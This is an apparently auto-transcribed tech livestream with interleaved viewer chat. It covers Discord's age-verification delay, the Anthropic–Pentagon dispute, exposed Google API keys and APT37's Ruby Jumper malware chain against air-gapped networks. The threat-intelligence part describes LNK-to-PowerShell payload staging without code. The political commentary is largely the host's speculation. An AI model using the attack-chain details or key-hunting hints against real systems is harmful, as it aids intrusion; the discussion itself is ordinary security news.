Yo, good morning. Where am I? There I am. Oh, not yet. Good morning. Yeah, how we like the little widget. I'm proud of it. I'm proud of it. YubTub, how you doing? All right. Good morning, PseudoNet. I think you just go by net.
Connected to channel Theo.
Oh, I was in the middle of the verification progress. I didn't finish that. Yep, we're good. Good morning. Okie dokie. What do I have? Wait, what did that say? Yes, remove it. Okay. Two weeks after introducing plans for global age verification, Discord is delaying its rollout to later this year to make changes to how it will work. The move comes after user backlash, with Discord saying many misunderstood. Yes, everyone. Good morning. Good morning, Blurry. Yes. Everyone, many misunderstood its system and intentions. Yes, that's the problem.
Blurry says.
GM.
Translated from Vietnamese.
Discord announced plans for an age assurance system that verifies whether a user is an adult or a teenager and sets limits on their account. Hey, you like my little widget up here? Can I start it? That makes me so happy. Discord announced plans for an age assurance system that verifies whether a user is an adult or a teenager and sets limits on their account. Discord says 90% of its users wouldn't need to share an identity document to confirm their age, but some would need to do so to continue using all of the platform's features. The gaming-focused messaging tool originally planned to introduce age assurance features in March, but its new delays pushed them to the second half of 2026. An exact launch date has been confirmed. In a blog post, Discord CTO, Stan, the way this landed, many of you walked away thinking we were requiring face scans and ID uploads for everyone just to use Discord. That's because, Stan, that's kind of what you said.
Gromit no says.
It was the article that blew the lid of that news. Link to the technical blog in there as well. Web link.
I'll take a look at that. Gromit, no. Welcome back. Good to see you. I'm glad to see our discussion didn't deter you away from never coming back. Can we agree? Yeah, we watched it. We looked at this. Yeah, we looked at this last week. We must have looked at this before you popped in. I remember the top, the rage, and this this graphic. Yep. Can we agree? Why did this happen? Why did it happen? So a couple articles were written. I don't think that was it. In my opinion, it happened because enough people walked away from the platform. Enough people canceled their, what's it called over on Discord? Nitro. Canceled their Nitro, walked away from the platform, and hit the company in their wallet. That's how it happens. They didn't do this because there was a couple articles written about them. No.
Seasoned Mind says.
Morning, Theo.
Morning, Sick of the Mind. How are you doing? Dude, that was a good stream last night, Kira. That was a good stream last night. He's not wrong on
Peachy.
I mean, I'm not trying to say that. He's dead on. He was dead on all of his points last night about learning yourself, about failing, about learning from others. Like, he was right on.
Pseudonet says.
There were so impulsive reactions to Discord's announcement, nobody actually did the digging.
Gromit no says.
Yeah.
The backlash came because of the data retention and the link to Palantir Puerto Rico nightmare for a company that plans to IPO this fall.
We're not going to get, we both can speculate, okay? Nothing, in my opinion, nothing happens on a company level unless they think something's going to make them money or something's going to cost them money. Yeah, there was some public backlash. There was a lot of articles written about them, about what you said about the data retention linked to Palantir. But in my opinion, because enough people walked away from the platform, they saw their usage drop, and nitros drop, that's the reason. And we'll never get an answer from them unless we get an insider.
Heck Inspector says.
Cactus.
Pseudonet says.
Valid.
Grommet no says.
Hey, we agree on something.
There we go. Yeah, we can agree. We can agree on that. We can agree that it was a combination of the factors, right?
Click says.
Yo.
Translated from Estonian. Heck Inspector says.
Agree on these. Away. Good morning.
Good morning, Inspector. How you doing? So this is an article written by PC Mag about them. He said in a blog post, Stan said there's this chief technical officer. The way this landed. Hey. Wrong button. He said, whoa. The way this landed, many of you walked away thinking we were requiring face scans and ID and uploads from everyone just to use Discord. That's not what's happening. Everyone calm down. Please re-up your nitro. He goes on to say, but the fact that so many people believe it tells us we failed at our most basic job, clearly explaining what we're doing and why. It goes on and on and on and on and on, but it doesn't go much longer, but he walked it back.
Grommet no says.
Good outcome here is the development acceleration on projects like WebLink.
We're going to look at this through the lens of a AI summarization.
7H30 BBS.
Click says.
What are we up to today?
We are, if you would take a look above me, we have a nice little agenda for the day, right? Right? NBA Lite 1330, or NBA Lite Leet. Good morning, my friend. I'm studying not Net Plus exam, and you inspire me. Thank you very much. Thank you very much. That's what we try to do, honestly. That's what we try to do. Let us know if you have any questions. Let us know if you need any help, NBA Lite. So that's what we're up to. Yes.
Oh, cute.
Use the light shining from my bald head to illuminate the agenda above me. Good outcome here is like the developer acceleration on projects like Root.app and Stoat. I'm not familiar with those, but it sounds like the same. They missed the mark. Yeah, I thought that was funny.
Heck Inspector says.
Agenda above the bald spot.
Grommet no says.
Admitted they missed the mark, lol.
Seasoned Mind says.
We have a few things to talk about.
White Matt this morning. Cool story, Bob.
It's not. That's because I need a. Well, the front of it. The front is shiny. I'm pretty bald. Discord announced mandatory age verification. Users lost their minds. Discord blinked. It delayed to H2 2026. Legal pressure mounted through 2025. New Jersey Attorney General sued Discord in April 2025. I didn't know that. By 2025, 80 plus lawsuits involving Discord and Roblox. Okay, so yeah. So there it is. There it is too. Like we said, it was a combination of, backlash, public backlash, articles, people pulling their Discord, but also losing money. If they're involved in all these lawsuits, that's losing money. We got to do something. We can't keep getting sued. National Center on Sexual Exploitation put Discord on its Dirty Dozen list 4 years in a row. UK Online Safety Act kicked in July, requiring age verification. Then they announced global expansion. what Discord actually proposed. Everyone starts in a teen appropriate. You verify your age to unlock adult content. If their systems can't determine your age, which is what they were saying, they have systems to do that, then you will be required, which I'm sure we'll see different communication on how they're planning on doing this.
Heck Inspector says.
Gotta hit the bowling alley. Polish her up.
Susan Klein says.
Blame Roblox for everything. Roblox needs to age verify and monitor communications. TBH.
Yep, agree. It's a constant thing that we as me and my wife as parents have to manage.
Pseudonet says.
Roblox does have an issue. This is a disgusting, unfortunate scenario. But this is bleeding too much into non-underaged activities.
I hear what you're saying.
No says.
They got their first slip on the wrist in the UK this week. Weblink.
Susan Klein says.
Like you don't put your kids in a daycare because of their lax controls around adults interacting with your kid.
Gromit no says.
Slap.
You don't put your kids in a daycare because they're lax controls. Oh. I hear you, sick in the mind. I do. But look, these platforms are not designed with kid safety in mind at all. They're businesses and they're meant to serve up ads. With that in mind, like before shorts, the rule in our house was you have to use my account. You have to use a parent's account to watch YouTube, and you can only watch channels you're subscribed to. We're subscribed to. So there's a mix of like Dan TDM in my thing. Dan TDM, Lauren Z side, and then all my tech stuff. So then we keep an eye on the history to make sure that she's only watching what we're subscribed to. With shorts, they don't have any protections. They don't have any protections. They have no way for you to monitor. They have no way for you to block. You can block adult content, but I'm not blocking adult content on my thing. So then you have all these shorts that they just come through. They just come through. The next one just comes through.
Caveman Crafting says.
Morning.
Good morning, Caveman
Susan Klein
Crafting.
says.
Nope.
Welcome back. How you doing?
Shorts are TikTok regurgitation. Same as Reels.
Caveman Crafting says.
Fuck him having such a fight with Discord ATM. Trying to set up bots for each of my agents in my executive team. Gateways keep talking.
Mm-hmm. What are you using the agents for, if you don't mind? I missed the whole agents rollout and usage. I never started up any of them. I'm using skills right now. I'm using a lot of skills right now. I haven't watched it. No, Grimmett. No, I've seen it.
Caveman Crafting says.
Working through spinning up the bots in Docker containers and setting up the containers to talking to Gateway and OpenClaw.
I have so many questions for you, Caveman Crafting. What are you doing to protect your system deploying OpenClaw? So that's my point. Sick in the mind. I agree with you. Parents need to be involved. It's a full-time job. I'm not excusing it. What I'm saying is that things slip through the cracks. My daughter wants Snapchat when she turns 13. And I told her, I says, we'll talk. Well, she asked us for it, and she's 12 right now. And I says, you can't have it. You're not 13. That's the law. So we said, when you're 13, we'll talk about it. And I'm already talking to her about shit doesn't disappear. Pictures don't disappear. Messages, they disappear, but people can screenshot them. Like, people can screen record. We talked to her about bullying. Absolutely not. You're not bullying other people. If people, and tell your friends, we're monitoring your chat. We are watching the messages come through. So if they don't want to say so, they better not say something that would get them in trouble. We talked about how having lewds on her phone, even if they're her, it's against the law. Number one. Number two, don't take lewds. Like with my 12-year-old daughter.
I have an agent for each role. CTO, COO, CMO, CRO, QA, PRD. OpenClaw on its own Mac Mini, and each agent has its own unique keys.
Okay, so time out. Caveman crafting. I haven't done a deep dive enough into OpenClaw, but you need additionally, I have specific guidelines in our team handbook to talk about communication, security, and privacy. Hey, that's cool. I'm reading down because I don't want to say something that you're already working on. Do you have a GitHub of those guidelines? If low-key Abu were here, they could give me the, what is it called? Was it Shield?
Seasoned Mind says.
If there was ever a case where AI should be used to monitor, Roblox is where it should be.
Right.
All the kids are using Snapchat these days.
But that's the point. Like, they're not going to do that. They're not going to deploy that on their platform and wipe out half of their user base. No. Them shareholders or their owners of Roblox, are you kidding me? Dude, hey, they're working on their third house and yacht. Like, they can't have a blow to their user base like that, and all the data that they scrape from them, and all the microtransactions. Come on, hey, think about the rich folk, man. Think about the billionaires, the Roblox billionaires. Think about them. Come on, be a little more sensitive. Before I get, I'm already. Good thing we have the timer up over here, right? Huh? Check it out. Caveman crafting.
HTB says.
That's the way.
Take a look,
Caveman
perhaps.
Crafting says.
Additionally, I have specific guidelines in our team handbook about communication /security /privacy.
Seasoned Mind says.
Snapchat allows messages to disappear after 1 week, 24 hours, etc. And location sharing.
Yes,
HTB
location
says.
sharing.
Parenting is always the best prevention for this.
Seasoned Mind says.
Yay, even if it's a selfie. Especially if you have automatic cloud backups. Now you have that in your account.
Tibet Click
Yep.
says.
I've been hearing about OpenClaw,
Gromit No says.
or Iron Claw, Rust project with security and focus.
Theo says.
Weblink.
Caveman Crafting says.
No,
Okay.
I kinda keep that super secret because I'm aware that chinks on the armor could also be found.
Yep, smart.
One thought I had was to create a second red team agent that is designed to evaluate the other's security.
That's a great idea. That's a great idea. All I'm saying is
311
3 Code Warrior. Good to see you. 3D Code Warrior. All I'm saying is Caveman Crafting. It is an evolving space, and I don't even know you. I'm not trying to lecture you. Sounds like you're on top of it. Keep staying on top of it.
002 says.
Hello Theo B7H30
DJ Zero.
7H30 rotary dial.
How are you doing? Oh, and 3D Code Warrior, you're new to the channel. Welcome. How are you doing today? How did you find us, if you don't mind me asking?
Hi guys.
Caveman Crafting says.
It's like the internet in the 90s smile style.
You hit dead on.
I've survived the Earthbot wars of the mid-90s.
That very okay. So
002
you may have
says.
Yeah, I am back.
a year or
Thanks,
two on
I'm
me.
good.
I think
What's
we're about
about
the
you?
same age. I'm late 40s. Yeah, you hit it right on the head, Caveman Crafting. The seasoned cybersecurity professionals at work are licking their chops at the potential, the Wild West as it is again. Red Team Rookie, good to see you again.
Do you got the game? Smile.
3 Code Warrior
What game?
says.
What game were we talking
Switch
about?
left bar recommendations. I watch a lot of Dev Siraja 1 Nerd Arena Kirby or Megalo.
No, that's cool. I'm glad Twitch is recommending me. YouTube, not so much. YouTube doesn't like my content. There's a few people on YouTube right now, if you don't mind me saying. NBA Light Leet. Oh, and Red Team Rookie, we just said hi to. You have a Sec Plus exam in 2 weeks. How you feel about it, Red Team Rookie? Okay. Discord. I was hoping Zemetrix would stop by. I'm sure that he'll be here later and he'll have choice words about this next one. This one is so fresh that I have a reaction to it. And I'm absorbing all of what has been going on and trying to understand it to craft my opinion. Like,
Caveman Crafting says,
The biggest thing is I limit what channels/Discord servers that the agents interact with. Also how they interact with emails coming in. Input is highly sanitized in different ways before getting to the agents. Also, I only use my own built skills.
That's smart.
I respect Anthropic's standing about the guardrails.
So, two things. We're going to get to it. I'm going to read through a timeline, and this is going to be an AI summary, and I have some links I want to go through too. But that's good to hear. You're using your own built skills. A lot of people are taking stuff pre-done out of like the skill marketplace, the OpenClaw skill marketplace, and is like it's not good. You know, they're basically. I mean, OpenClaw is basically a foothold. Like, it's already on your network. Not you, but it already has a lot of like permissions already. So like, it's a problem.
It's like, where's haha?
I did want to take the articles that it.
Pseudonet says,
People are downloading harvesters at this point. Gotta go fresh.
Let's do Axios, and let's look at Fox News, but Fox News has something. I got to build into that co-work thing. Get the fuck out of here. Never mind.
Heck Inspector says,
CNBC.
B7H30 Kermit T.
ZB says,
Oh yeah, BTW. If your government doesn't like Anthropic anymore, as Europeans we will gladly take them Kappa.
Well, look, we were talking about Discord, right? We're talking about Backlash and what they experienced. Now, look, there's a lot here. We have to go way back, because my initial gut reaction to the government trying to invoke the Defense Production Act of like 1950 is an open wound still for Youngstown, Ohio.
Olivostero says,
Bald man is very mad at Discord.
Oh, we've moved on. Discord got what they want. Discord got what they got coming to them. Fox News from 4 days ago. They haven't written an article since. Youngstown Sheet and Tube versus Sawyer, 1952, the OG executive overreach. So we're going to read through this real quick because the government tried to use the Defense Production Act here as well.
Wapinion says,
My initial gut reaction to anything the government says is to vomit.
002 says,
Theo, I mean it's game that was posted in your ultra secret Discord chan, this builder game. I forget the name. Lol. Can't check ATM frown.
No, it's fine. I think it was called Data Center. Loaf's been kicking the tires on it.
Yeah, data.
Data Center? Data Center, yeah.
This one.
That's right. We'll see. Loaf was not very impressed.
Caveman Crafting says,
Are you an amateur radio guy, BDW?
I'm not. You mean, am I like on amateur radio? No.
Giggle.
No. If you have any ins with voice acting, you know anyone hiring voice actors, let me know. I think that'd be a good side hustle.
Caveman Crafting says,
Was curious by the B7H30 thing, haha.
Heck Inspector says,
Amateur radio aka ham radio.
Oh, I hear ya. No. Gotcha. No, B7H30 is lead speak for B Theo. That's why people are calling me Theo.
Wapinion says,
BCNU.
Translated
Sorry,
from
Dave.
Indonesian.
I'm afraid I can't do that.
Pseudonet says,
Ebooks pay out good from what I hear for voices, but I'm bleeding into that as well.
Yeah. So, Red Team Rookie, since I have a reattempt, I'm not that nervous. I'm going through Messer's practice exams, notes, and videos. Very cool. Yep, that's a good one. So let's start way back, okay? Short version, TLDR. Korean is going on. Steelworkers go on strike. President Truman says, not on my watch, seizes the steel mills. The Supreme Court says, actually, yes, that's going to happen. Truman immediately backs down. So Korean War is hot, 1952. Steel is critical to the war effort. United Steelworkers of America is threatening major strike over wages, not about the war, wages. Congress passed the Defense Production Act 2 years prior to give the president tools to stabilize wartime production. But it deliberately did not include authority to seize private property. Truman tries to get the Wage Stabilization Board to resolve it, and it fails. April of 1952, Truman goes on national radio, announces he's ordering Commerce Secretary Charles Sawyer to seize and operate the nation's steel mills. Justification, Article 2, executive power, commander-in-chief authority. Steel companies go straight to federal court the next morning. The decision, 6-3. Presidential power must come from Congress or the Constitution, period. No statute authorized the seizures, so it's unconstitutional. Justice Jackson's three-zone framework.
L337 4G3BOOM3R.
Oh, I see what you did there. President acts with Congress. Maximum power, almost certainly constitutional. Congress is silent. President acts in twilight zone. Constitutionality is uncertain. President acts against Congress. Lowest ebb of presidential power. This is where Truman was. Congress had specifically rejected giving the president seizure authority during DPA debates. Aftermath. Truman was reportedly blindsided. He thought the court would back him. Immediately returned the mills to their owners. Workers went on strike the next day. The strike lasted 53 days. Why it still matters. The case gets cited constantly in executive overreach debates, border walls, travel bans, emergency declarations. It's directly relevant to the Anthropic DoD situation. Can the executive branch compel private companies to behave in certain ways in our national security framing? Spectre, we need to do a docs. I think a docs counter. Youngstown is literally your city. This happened here. The mills in this case were in Youngstown, Ohio. The Defense Production Act exists today, but has been used for COVID PPE, baby formula storages, and chip manufacturing.
Caveman Crafting says,
Kind of wonder if they could get it via many domain nowadays. Gotcha. I'm actually having my CTO/QA/PRD guys working on 2 projects now. One is a rebuild of a ham log software into Electron from very old VB. The other is AI-powered auto dialer for Suite CRM, so I can onboard my sales guy without having to spin a bunch on the dialer via GHL.
Dude, you are operating.
They already said they're giving Grok everything.
Who? The DoD is giving Grok everything? OpenAI penned an agreement shortly after, which is interesting too, because I saw a video prior where Sam Altman was saying that that he is not in favor of them, the government enacting the DPA, and his thoughts on mass surveillance and AI operated missiles and stuff. But I have a feeling they gave OpenAI and Sam Altman a gigantic pile of money.
Yep. Yay, they reportedly are PO King Grok for secret work.
Look, we are in a strange time right now. We are in some unprecedented territory with AI. And I tell you what, the fact that they tried to invoke the DPA, like I said, is sore territory for me. Like, after this happened, like they decimated Youngstown. Youngstown was one of the big steel producers in the nation, and they decimated it. The pictures of Youngstown during that time compared to now, it looks like a major metropolitan area. I mean, that's just the aftermath. That's honestly neither here nor there.
Anthropic barreling now towards a potential split with the government. The AI company's CEO, Dario Amodei, saying that Anthropic, in his words, quote, cannot in good conscience allow the Pentagon to use its AI models without limitation. Now, Anthropic has been in what has been some pretty intense negotiations with the government, which wants the ability to use the company's technology for what they're calling all lawful purposes. Anthropic barreling now towards a foundation. Good morning to you. For the Pentagon to designate Anthropic a supply chain risk. Pretty intense negotiations with the government, which wants the ability to use the company's technology for what they're calling all
Trump ordered
lawful
all agencies
purposes.
to cease use of Anthropic
though,
instantly.
wants to put limits on 2 things: mass surveillance of Americans and on autonomous.
So why is he doing that? Because if we can't use them,
I'm sorry, Dave.
if the DoD can't
I'm
use them,
afraid I
then
can't do
we don't want anyone to use them. He's hitting them in the pocketbook. Is what he's doing. It's what he's doing. Hey, hear me out. Like, the government employs a lot of people. Like, they've reduced their staff, the overall government, but they still employ a lot of people. And each one of those people come with a license to use the AI or whatever software that they use. It's a big moneymaker. If you can land a government contract where a lot of people use your software, it's a lot of money. So he's using the power. Where have I heard this before? He's using the power, his purchasing power, to hit Anthropic in the pocketbook. Almost like what happened to Discord.
And then they're supposed to start using XAI.
Seasoned Mind says.
I feel like Anthropic just won public opinion though.
Yes.
I don't see their stock going anywhere but
But so, like, this, I agree with you here. And that's what has, again, that's what has to happen. That's what irritated me so much last week, was the fact that, like, people were like, oh, what can we do? What can we do? If enough of people get together, if they have such a problem with mass surveillance and privacy and some other things that I haven't landed on yet, like, they should vote with their pocketbook. They should vote with their dollar. And what I mean by that is that they should cancel their OpenAI subscription. They should cancel their Grok, their XAI, and move to Anthropic.
Caveman Crafting says.
If
This is kind of his go-to, is the pocketbook attack. And it's effective.
it is effective, that's what irritates me.
Get the YOLO.
I'm not trying to get too political here. To stay as neutral on the politics as I can, that can be applied to anything. If you're upset about Chipotle charging $1 for a side of sauce, don't go to Chipotle anymore. Tell your friends about it. You know what I mean? Insert whatever greedy software, retailer, food distribution, insert whatever one in there and apply the same logic. Honestly, okay. This is why they want all of us divided. I hate saying this is why this is why they want everyone divided. Because if you're divided and you're talking about other things, if you're divided on other topics, then it's easier to divide you up on these topics.
Wapinoon says.
CIA monitoring this stream for sure now.
Heck Inspector says.
Claude is better anyway, XD.
Yeah, Claude is
Caveman
stupid.
Crafting says.
It's bonkers.
All of my agents are running on Ollama. I use local models and Kimi for my agents. 20 per month, and I have yet to hit the cloud limit.
Yeah.
But it is they, because they are all buddy off camera.
Yeah. Yep. It is. Gosh, I hate saying it, but they want you divided. They do. The best thing you could do right now, if you're happy with what Anthropic did, the best thing you could do is cancel all your other AI subscriptions.
Seasoned Mind says.
But the NSA would definitely be monitoring Twitch.
Heck Inspector
Yeah.
says.
Yeah.
FR0s on NMM.
Translated from Polish.
Weapons. And in his statement, Amodei said that the threats by the Pentagon to designate Anthropic a supply chain risk or invoke the Defense
Caveman Crafting
Production
says.
Act don't change
I
his
work around the
position.
Richie Riches.
Earlier this week,
This
Defense
is what
Secretary...
they do. Heck, so many of the businesses build into product prices liability/lawsuits from people when they find out something is wrong. Then still release. Look at the baby powder stuff.
I work around Richie Riches. This is what they do. Heck, so many of the businesses build into product prices, liability lawsuits from people when they find out what's it. Yep.
Wapinoon says.
Oh, it's only the NSA? No problem in that case.
Yeah, if it were the FTC, I'd be like, whatever. Okay, FTC. Oh. Oh no, not the FTC. Oh.
Pete Hegseth, deadline of today
yeah.
at 5 p.m., 5:01 exactly, for Anthropic to agree to the government's demands. I want to talk about.
So this is
a fascinating issue. Joining us.
This is prior.
Official.
Oh, dude's got two different colored eyes.
I'm sorry, Dave. I'm afraid I can't do that.
Gromit no says.
But how will they enforce the supply chain ban on any vendors using Anthropic?
How will they? Oh, any of their vendors. Yeah.
Wapinion says.
I don't know. I don't know.
Translated from Dutch.
I mean, it would have to be through, I would think, so you have to go through a process to be a DoD vendor. And in that process, there's a discovery that you could tell what they're supposed to provide a list. My CMMC is not nearly where it needs to be. From what I remember, you have to give them a list of software that's running on your network. So that's one way you can enforce it. I'm not sure how often they go through CMMC re-upping, but that's another way that they can enforce it. But, yeah.
Heck Inspector says.
I'm running Nonya. Lol.
What's Nunya? Spectre, what'd you send me? Cybersecurity roadmap?
Nonya business.
Heyo!
BTW, did you catch the news with Summer UA Meta Security VP and OpenClaw? Hilarious.
I did.
GB says.
That was so.
GG.
Translated from Latvian.
That was so delicious. I didn't have lunch that day.
Got him. Not like this.
Dude, what is that? No, that's not Telegram. That's WhatsApp. The WhatsApp messages of her yelling at the open claw. Why are you doing that? Stop doing that. In all caps. Stop deleting all my email. Oh my God. Oh. It was so delicious. I can't believe there's not any newer articles just yet. 2 days ago, today. Oh, okay. Oh, and here's Fox News. OpenAI reaches Pentagon agreement as Trump orders Anthropic off federal systems. And you know what? Trump put the screws to Altman too, probably. I mean, he had him up there at the beginning talking to what? It was Oracle and Sun Systems when he first got elected about all this investment in AI infrastructure. He put the screws to Altman. Hey, do you want these data centers? Sign the agreement in so many words.
Caveman Crafting says.
And this is why mine has its own email account, haha.
Caveman Crafting, it sounds like you're doing it the right way.
BTW people just like to make a big thing out of this.
And I just missed it. Super Germal, thank you for your 21 months of support. Thank you for your resub. How you doing today, Super Germal? Hey, I have so much to show you all today. Like, this was just the beginning, and I'm going to have to pause it here because we're going to get the Hacked Box cozy hosting, but.
Wapinion says.
Spaced 44 rip spaced 44 lighter spaced 44 body spaced 44.
It was a test environment, by the way. People just like to make a big thing out of this. Oh, but the Summer U? Meta Security VP? It was a test environment? I read an article on that. I didn't see anything about test environment. I must have missed it. Oh, No one watching Fox News watches this clip art shit. Federal judge allows Trump's $400 million. What is this?
Gromit no says.
Nah, that was not a test hand. That was a Google Workspace account.
Article showing, I'm requesting the article for saying that it was a test environment, ZB. Not that I don't believe you, but I missed it. I want to see where I missed it. OpenAI CEO Altman announced Friday that his company reached an agreement with the Department of War to deploy its artificial intelligence models on classified work, just hours after President Trump ordered federal agencies to phase out rival Anthropic. Altman said on a post in X, by the way, it was one of the longest. I almost feel like Trump gave him this. It was one of the longest posts Sam Altman has ever posted. Couldn't have been him. Couldn't have been him.
Wapinion says.
I didn't know.
Talk about the Google API privist to Gemini endpoints.
If you have that, absolutely. I saw it briefly. I that is almost as delicious as the OpenClaw one. If you have an article for that, I'll take a look at that too.
Caveman Crafting says.
Sam used Claude to write a tongue.
Nicely done. Nicely done. Nicely done. Altman said in a post that he had been in talks with the Pentagon's, which displayed a deep respect for safety and desire to partner and achieve the best possible outcome. As he's struggling to hold the gigantic bag of money.
Heck Inspector says.
It's a roadmap I sent you.
I know, but what is it? Like, what do I do with that? Is it HTML? Yeah, it's HTML.
Yeah.
Kilobyte 808 says.
Yo, what is good? Happy Saturday.
Kilobyte, what's up? Happy Saturday. AI safety and wide distribution of benefits are the core of our mission, he said. Two of the most important safety principles are prohibitions on domestic mass violence, mass surveillance, and human responsibility for use of force, including autonomous weapon systems. It's funny. It sounds like the exact two things that Anthropic CEO had a problem with. Kilobyte, I see you on YouTube. Thank you. The Department of War agrees with these principles, reflects them in law and policy, and we put them into our agreement. So, what's missing?
Wapinion says.
Here we go.
What's missing between the two?
I'm afraid I can't.
The two
do that.
talking points from OpenAI, the Department of War, and the CEO from Anthropic. What's missing? Did you catch it? It's okay, I'll tell you. The open, unfettered use, the unrestricted use of their AI. Sam doesn't say anything about putting in guardrails. Sam doesn't say anything about not allowing those things, but not specifically allowing those things. I'm guessing that OpenAI is giving the government unfettered use to these things. The deal came after Trump directed every agency to stop using Anthropic technology, escalating a standoff over how artificial intelligence should be used in the military. Caveman Crafting, before I forget, I think you're doing it the right way. Nice. It sounds like you're doing it the right way. You got your agents and everything, how you doing your agents and stuff.
Caveman
Anyways,
Crafting
glad you're
says,
here to share that.
I am surprised the US doesn't have something akin to PewDiePie's set up somewhere with a big trained model.
Gromit No says,
Now this is kinda cool. APT-37 adds new capabilities for air-gapped networks, WebLink.
They have, the government is sorely behind. I mean, remember, like, how long ago was that hearing with Facebook and Mark Zuckerberg about, you know, the politician asking Zuckerberg how you make money? Like, I can't talk about that. I just think they're behind. They're way behind. They don't. They're way behind. Caveman crafting. They're way behind. He says on Truth Social, Anthropic better get their act together and be helpful during this phase out period, or I will use the full power of the presidency to make them comply, with major civil and criminal consequences to follow. Pocketbook. We all could learn from that. Not even joking. We all could learn from that. Effective immediately, no contractor, supplier, partner. Okay, we did all that.
Caveman Crafting says,
Oh, contractors too.
Mm-hmm.
That's even bigger.
Right, but there's no easy way to do that. ZB, words or spells. I'm not going to let that through. What's on Imager? What's that? Yeah. Yeah, compaction on her email inbox. Dude, if you're using, if like, Caveman crafting, I like I said, I never got into the agents thing. I'd like to know. I'm trying to think of like what you can tell me. I mean, you kind of did. You kind of did say what you're working on.
Gov websites are being built with help of Clodder C code.
Right. We talked about that briefly, where it's like, how do you enforce that? Like on government computers, you can put in protection. You can put in, you can blacklist programs. You can blacklist websites. So that'll take care of the government computers. But vendors and contractors, if the contractor is using a government laptop, then you can do the same thing. But like vendors, I think the only way you catch that is during the CMMC enrollment certification. I'm not even sure what it's called. To do business with the government. And I'm not sure if there's re-upping for CMMC. It's a big blow. That's what it comes down to. It's a big blow to Anthropic's business. But again, we all have that power. We just have to. We have to get on the same page with the group of people in control of all that shit. All of us need to get on that same page, and not use a service or software or whatever. We need to do that when we're upset about something.
Gromit No says,
But do vendors have to revert all code developed with Claude?
I don't know. I don't know.
Wapinian says,
It's actually 2 years, but I was going to say you're so advanced now compared to when I first met you.
Oh, thank you. Advanced? I don't know about that. I'm learning more every day. Thank you for the kind words, Opinion. Thank you. I try to learn every day.
Caveman Crafting says,
Maybe you'll share my repo with a base agent setup.
If you feel
Opinion says,
inclined.
Come a long, long way, bro. I'm proud of you, man.
Right on, bro. I'm proud of you. Whoop. I wish I was more active in your Discord, but I see all the changes and all the stuff and all the pushes, all the code changes and pushes on GitHub that you're making. So
Caveman Crafting says,
Scanning it first to make sure I don't have any keys or passwords in it. Smile, smile.
smart.
Opinion says,
Less than 3.
Altman said OpenAI would deploy additional safeguards to ensure its models behave as they should, and that the company would only operate on cloud networks. We're asking the DOW to offer these same terms to all AI companies, which, in our opinion, we think everyone should be willing to accept. We have expressed our strong desire to see things de-escalate away from legal and governmental actions toward reasonable agreements. Okay, now that's interesting. So we really don't have all the information. There's a sticking point there that I'm not seeing, but we're moving on. Previously harmless Google API keys now expose Gemini AI data. So this is about that. Google has long said that your keys are not secrets. Yes.
This is a huge foobar.
Yeah. They've previously said that API keys are not, it's not a secret. Used as a project identifier, totally cool for client code. Today, after you enable Gemini on your project, please don't notice me. The same key today can access sensitive Gemini endpoints. Think about this. Think about all those Google API keys out in the wild that they're told they weren't secrets. They're safe to be out there in code. Can you search that show? Is that a show, Dan? Is that searchable? API keys? I don't think it is. You could probably look for the endpoint. You could probably look for, right, maps, Google APIs.com maps.
Everyone's scrambling to check their client code,
Yeah.
JavaScript, etc., to
Yep.
find old keys for things like maps, etc. Yes, it is. They've done it. They found 2,600-ish.
Oh, look at that. It's in the article. Truffle Security scanned the November 2025 Common Crawl dataset, a representative snapshot of a large swath of most popular sites, and found that more than 2,800 live Google API keys publicly exposed in their code.
Gromit No says,
Time for some Google dorks.
That's going to be a problem. And then Zscaler blog, APT37 adds new capabilities for air-gapped networks.
Opinion says,
Yeah, Google themselves got done. They had access to the internal Google Gemini, by the way.
Gromit no says.
Jesus.
Scroll down to the first image.
Whoopie Noon says.
Yes.
Thank you for the article, Whoop. Yep. If you have Google API keys in your code, you're going to want to do something about that. You're going to want to turn that into an environment variable and put it in your git ignore. Right? I'm surprised I know that too.
Appreciate the discussion.
Anderson, you want me to? Barcode Tourist, good to see you again. Thanks for hanging out on YouTube. Hey, how many do we have on YouTube now? Two concurrent viewers. No, it's on fire. Attack flow. Now, APT-37 adding new capabilities for air gap networks. So they're talking about accessing air gap networks that should not be able to be accessed. Initial vector.
Gromit no says.
Look at that chain.
Windows shortcut link. First stage downloader. REST leaf. Second stage payload delivery. Snake chopper. Interact with air gap host with removal media, thumb SBD virus task, conduct surveillance, blue light footwine, command and control. Wow.
Barcode Tourist says.
:D.
So, yeah, this involves getting it on a system. They jump right to REST leaf. Yeah, but it talks about Windows LNK files. APT-30,
Gromit no
excuse me.
says.
Not just getting them, but getting out air gapped as well.
No, I understand. Look, I understand like the seriousness of this. Getting information out of an air gap network is a big deal. I mean, they're that way for a reason. This is not like a mom and pop operation. Just someone doing work for the government. They have to have an air gap system. APT has abused LNKs as an initial vector for years. In the Ruby Jumper campaign, which I'm not familiar with, when a victim opens a malicious LNK file, it launches a PowerShell command and scans the current directory to locate itself based on file size. Then the PowerShell script launched by the LNK file carves multiple embedded payloads from the fixed offsets within that LNK file, including a decoy document, an executable payload, and additional PowerShell script in a batch file as listed in the table below.
North Korea.
Muhammad Def says.
Hey, waving hand emoji.
Hey, Muhammad is Dev. Muhammad H. Dev. How you doing today? Welcome to the chat. Gee, okay, so it is in a decoy document. Okay, so yeah. So this is going to be bad if it somehow finds its way on your network. If this initial vector LNK is somehow executed on your network, it's a problem. It comes through an email, it comes through a thumb drive, right? Some kind of messenger. It could be a problem. The decoy document displays an article about a Palestinian-Israel conflict translated from a North Korean newspaper into Arabic shown in the figure below. The Arabic language decoy document leveraged in Ruby Jumper campaign. Each payload is created. Okay, so this is going to do a deep dive on it. I don't think we need to get into it, but I mean, APT-37's being busy. Interesting. Is this a gadget chain? Can I do... No, okay. Mohammed Dev, what are you working on today? This is not a gadget chain. APT-37, North Korean state-sponsored group running a multi-stage infection chain called Ruby Jumper that targets air-gap networks. The key distinction, a gadget chain, like deserialization attacks, Java gadget chains, .NET gadget chains, involves chaining together existing code snippets. That's right. Code snippets, gadgets within an application's own libraries to achieve arbitrary code execution through object deserialization. Think why so serial, ROP chains, that kind of thing. What Ruby Jumper actually does is more of a multi-stage malware delivery chain, propagation chain, LNK file, REST leaf, snake dropper. Okay. Okay.
Gromit no says.
The amount of testing that must have been done to verify all those components working as intended is kind of mind-boggling.
I agree with you, but have you used the plan mode on Claude? It does a lot of... It does... Dooku. Hey. 40 months, Dooku. Thank you so much for the continued support. You are like one of the longest subscribers. Thank you, Dooku. How you doing today? Okay. I'm going to thank you for sharing all that, gang. Good stuff.
Ajiku says.
Almost sleeping.
Wapimune says.
Gotcha. Yep.
B7H30 coffee fortnight.
